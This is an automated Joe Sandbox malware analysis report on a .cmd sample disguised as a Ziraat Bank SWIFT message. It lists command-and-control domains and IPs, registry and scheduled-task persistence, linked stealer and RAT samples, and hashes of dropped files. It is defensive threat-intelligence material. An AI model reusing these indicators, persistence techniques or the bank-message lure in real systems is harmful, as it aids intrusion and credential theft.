                                                                                                                                                                                                                                                                                                                                                                                                                                    		16276OVHFRfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                    72.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                                    		wxgzshna.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                    		32244LIQUIDWEBUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                    44.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                    		bumxkqgxu.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                    		14618AMAZON-AESUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                    85.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                                    		dlynankz.bizGermany
                                                                                                                                                                                                                                                                                                                                                                                                                                    		6724STRATOSTRATOAGDEfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                    54.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                    		nlscndwp.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                    13.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                    		xnxvnn.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                    47.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                    		qncdaagct.bizCanada
                                                                                                                                                                                                                                                                                                                                                                                                                                    		34533ESAMARA-ASRUfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                    18.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                    		ereplfx.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                    104.26.13.205
                                                                                                                                                                                                                                                                                                                                                                                                                                    		api.ipify.orgUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                    82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                    		vjaxhpbji.bizRussian Federation
                                                                                                                                                                                                                                                                                                                                                                                                                                    		43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUfalse
                                                                                                                                                                                                                                                                                                                                                                                                                                    18.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                    		ssbzmoy.bizUnited States
                                                                                                                                                                                                                                                                                                                                                                                                                                    		16509AMAZON-02USfalse

                                                                                                                                                                                                                                                                                                                                                                                                                                    Private

                                                                                                                                                                                                                                                                                                                                                                                                                                    IP
                                                                                                                                                                                                                                                                                                                                                                                                                                    127.0.0.1

                                                                                                                                                                                                                                                                                                                                                                                                                                    General Information

                                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                                                                                                                                                                                    Analysis ID:1557464
                                                                                                                                                                                                                                                                                                                                                                                                                                    Start date and time:2024-11-18 09:55:10 +01:00
                                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                                                                                                                                                                    Overall analysis duration:0h 15m 37s
                                                                                                                                                                                                                                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                                                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                                                                                                                                                                    Number of analysed new started processes analysed:45
                                                                                                                                                                                                                                                                                                                                                                                                                                    Number of new started drivers analysed:3
                                                                                                                                                                                                                                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                                                                                                                                                                    Sample name:Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd
                                                                                                                                                                                                                                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                                                                                                                                                                                                                                    Classification:mal100.spre.bank.troj.spyw.evad.winCMD@66/168@302/23
                                                                                                                                                                                                                                                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Number of executed functions: 61
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Number of non-executed functions: 208
                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Found application associated with file extension: .cmd
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                                                                                                                                                                                                                                                                    Warnings

                                                                                                                                                                                                                                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                                                                                    • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                                                                                                                                                    • VT rate limit hit for: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd

                                                                                                                                                                                                                                                                                                                                                                                                                                    Simulations

                                                                                                                                                                                                                                                                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                                                                                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                                                                                                                                                                                                                                                    03:56:10API Interceptor2x Sleep call for process: AnyDesk.PIF modified
                                                                                                                                                                                                                                                                                                                                                                                                                                    05:01:15API Interceptor144x Sleep call for process: alg.exe modified
                                                                                                                                                                                                                                                                                                                                                                                                                                    05:01:16API Interceptor27x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                                                                                                                                                                                                                    05:01:18API Interceptor169x Sleep call for process: Native_neworigin.exe modified
                                                                                                                                                                                                                                                                                                                                                                                                                                    05:01:24API Interceptor1x Sleep call for process: Juqmtmya.PIF modified
                                                                                                                                                                                                                                                                                                                                                                                                                                    05:01:25API Interceptor8x Sleep call for process: aymtmquJ.pif modified
                                                                                                                                                                                                                                                                                                                                                                                                                                    11:01:13Task SchedulerRun new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    11:01:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Juqmtmya C:\Users\Public\Juqmtmya.url
                                                                                                                                                                                                                                                                                                                                                                                                                                    11:01:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Juqmtmya C:\Users\Public\Juqmtmya.url
                                                                                                                                                                                                                                                                                                                                                                                                                                    11:01:33AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

                                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                                                                                                                                                                                                                                                                    IPs

                                                                                                                                                                                                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                                                                                                                                    3.254.94.185AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • ocsvqjg.biz/cm
                                                                                                                                                                                                                                                                                                                                                                                                                                    E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • uaafd.biz/byhbnbikqcomemw
                                                                                                                                                                                                                                                                                                                                                                                                                                    Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • ocsvqjg.biz/llnmgshpkylde
                                                                                                                                                                                                                                                                                                                                                                                                                                    AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • ocsvqjg.biz/jw
                                                                                                                                                                                                                                                                                                                                                                                                                                    SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • ocsvqjg.biz/xrujxccjxeybqwu
                                                                                                                                                                                                                                                                                                                                                                                                                                    AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • ocsvqjg.biz/cly
                                                                                                                                                                                                                                                                                                                                                                                                                                    PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • brsua.biz/rmsexfnebpnpl
                                                                                                                                                                                                                                                                                                                                                                                                                                    PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • ocsvqjg.biz/plbdbgmplm
                                                                                                                                                                                                                                                                                                                                                                                                                                    nL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • uaafd.biz/inbwfclciwgycy
                                                                                                                                                                                                                                                                                                                                                                                                                                    tyRPPK48Mk.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • uaafd.biz/flkouthsl
                                                                                                                                                                                                                                                                                                                                                                                                                                    3.94.10.348dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • lygynud.com/login.php
                                                                                                                                                                                                                                                                                                                                                                                                                                    7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • lygynud.com/login.php
                                                                                                                                                                                                                                                                                                                                                                                                                                    UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • lymyxid.com/login.php
                                                                                                                                                                                                                                                                                                                                                                                                                                    1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • lymyxid.com/login.php
                                                                                                                                                                                                                                                                                                                                                                                                                                    arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • lymyxid.com/login.php
                                                                                                                                                                                                                                                                                                                                                                                                                                    Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • lygynud.com/login.php
                                                                                                                                                                                                                                                                                                                                                                                                                                    WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • lygynud.com/login.php
                                                                                                                                                                                                                                                                                                                                                                                                                                    Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • lygynud.com/login.php
                                                                                                                                                                                                                                                                                                                                                                                                                                    uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • lymyxid.com/login.php
                                                                                                                                                                                                                                                                                                                                                                                                                                    7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • lymyxid.com/login.php

                                                                                                                                                                                                                                                                                                                                                                                                                                    Domains

                                                                                                                                                                                                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                                                                                                                                    nlscndwp.bizE_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 54.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                    AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 54.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                    nL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 54.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                    tyRPPK48Mk.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 54.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                    TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exeGet hashmaliciousFormBook, LummaC StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 54.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                    vjaxhpbji.bizAENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                    E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                    Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                    AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                    SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                    AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                    RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                    PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                    PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                    nL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 82.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                                    xnxvnn.bizE_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 13.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                    AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 13.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                    nL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 13.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                    tyRPPK48Mk.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 13.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                    TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exeGet hashmaliciousFormBook, LummaC StealerBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 13.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                    uaafd.bizAENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 3.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                    E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 3.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                    Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 3.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                    AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 3.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                    SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 3.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                    AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 3.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                    PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 3.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                    PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 3.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                    nL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 3.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                                    tyRPPK48Mk.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 3.254.94.185

                                                                                                                                                                                                                                                                                                                                                                                                                                    ASNs

                                                                                                                                                                                                                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                                                                                                                                                    AMAZON-AESUShttps://ow.ly/ok9750U8Nry#jeanette.marais@mmltd.co.zaGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 34.235.181.67
                                                                                                                                                                                                                                                                                                                                                                                                                                    https://us-west-2.protection.sophos.com/?d=vercel.app&u=aHR0cHM6Ly93ZWJtYWlsLWF1dGgtc2VjLnZlcmNlbC5hcHA=&i=NWVjYjQ2MzZmNTgwNWIwZWJlZWZkM2Fl&t=UXZ3YkZpNSszWkdZNlBPdUNtNGVRQTM2ZzV1SmdscHZTN2E0TDhEQUVMYz0=&h=41cf60c27bc24f608fa5f6f60edfa437&s=AVNPUEhUT0NFTkNSWVBUSVYWbs5htFrsKfDZKi2vxyeN8JAV7eyBc8AqkmOaHaHVi8YGx5zRAzUm2TNYTJQ1rCs#Ymtqb29AaGRlbC5jby5rcg==Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 54.221.78.146
                                                                                                                                                                                                                                                                                                                                                                                                                                    x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 34.225.41.190
                                                                                                                                                                                                                                                                                                                                                                                                                                    https://www.hopp.bio/granovitasauGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 34.203.173.1
                                                                                                                                                                                                                                                                                                                                                                                                                                    new.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 54.144.73.197
                                                                                                                                                                                                                                                                                                                                                                                                                                    botx.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 54.11.110.57
                                                                                                                                                                                                                                                                                                                                                                                                                                    botx.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 18.233.181.203
                                                                                                                                                                                                                                                                                                                                                                                                                                    botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 34.194.207.69
                                                                                                                                                                                                                                                                                                                                                                                                                                    botx.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 18.213.33.9
                                                                                                                                                                                                                                                                                                                                                                                                                                    botx.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 34.238.51.140
                                                                                                                                                                                                                                                                                                                                                                                                                                    AMAZON-02UShttp://inscrit.es/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 52.24.205.146
                                                                                                                                                                                                                                                                                                                                                                                                                                    http://inscrit.es/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 54.244.144.214
                                                                                                                                                                                                                                                                                                                                                                                                                                    http://www.employee-ratings.com/107519/fab30a/abf4a385-1883-4e57-8ade-771c19e19962Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 35.76.5.47
                                                                                                                                                                                                                                                                                                                                                                                                                                    #U051d==.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 3.125.2.57
                                                                                                                                                                                                                                                                                                                                                                                                                                    Unlock_Tool_v2.6.5.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 18.244.18.38
                                                                                                                                                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 3.170.115.57
                                                                                                                                                                                                                                                                                                                                                                                                                                    Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 13.248.169.48
                                                                                                                                                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 3.161.82.20
                                                                                                                                                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 18.244.18.122
                                                                                                                                                                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                                                                                                                                                    • 18.244.18.32

                                                                                                                                                                                                                                                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                                                                                                                                                                                                                                                    No context

                                                                                                                                                                                                                                                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                                                                                                                                                                                                                                                    No context

                                                                                                                                                                                                                                                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\Au3Check.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1353216
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.324391345568456
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:LC4VQjGARQNhiGXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:LOCAR0iGsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:ACF96EE843E48D0B024E2B4A892AC0CA
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3F33E9FB22E55C31C042D38F16FEE6FD6504724F
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7B5A1DB9D72A62A6759DC287E8DE7BC8F23E0679262EEDCCA84D81E5CB69CD89
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9879878C9724150F72FEAF5BB8238266C12B615AEFC64381AD0E762B427CB40543A3581D8FBEBA0C8FF8A633913F7A06E12F2EE7C129BC1BF559EC0B871635D5
                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@...........................!.............................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....P...p...@...f..............@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\Au3Info.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1294848
                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.282705400499314
                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:DNUpaKghVXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:DCMKgHsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3D98066AD6AEAE4B668ABF7FFB2850F5
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5588BF4216A491FBD460AD8C912CDA7AE3AA81A3
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:D3CF43B0696E95DB8226919BE0E1FD2D71366AA7F94FCD84C39EC5AF0F2FBF97
                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FCF8B080BDF1B63C2072A7DED5EC8927C99364EA4B4B35309FED8B3879106BF0F044771806E491240FFB8FA789AE9C2DF73D5F3C1F204A7EDD1C08FAA9E21944
